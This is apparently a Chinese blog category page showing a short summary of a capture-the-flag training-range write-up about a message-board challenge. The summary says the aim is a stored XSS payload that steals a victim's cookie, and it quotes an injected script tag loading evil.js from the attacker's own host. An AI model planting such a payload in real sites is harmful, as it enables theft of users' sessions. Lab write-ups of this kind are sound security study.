会员
周边
众包
新闻
博问
闪存
赞助商
Chat2DB
所有博客
当前博客
我的博客
我的园子
账号设置
会员中心
简洁模式
...
退出登录
注册
登录
43299
博客园
首页
新随笔
联系
订阅
管理
文章分类 -
封神台
公开课基础演练靶场-第三章:为了更多的权限!留言板!
摘要:tips提示就知道是要我们构造存储型xss payload获取受害者cookie。 本来我电脑上已经有了phpstudy,于是自己上网查资料写了代码。 网站留言部分注入<script src=”http://本机地址/phpstudy网站目录/evil.js”></script> evil.js文件
阅读全文
posted @
2023-02-28 13:28
林序
阅读(250)
评论(0)
推荐(0)
公告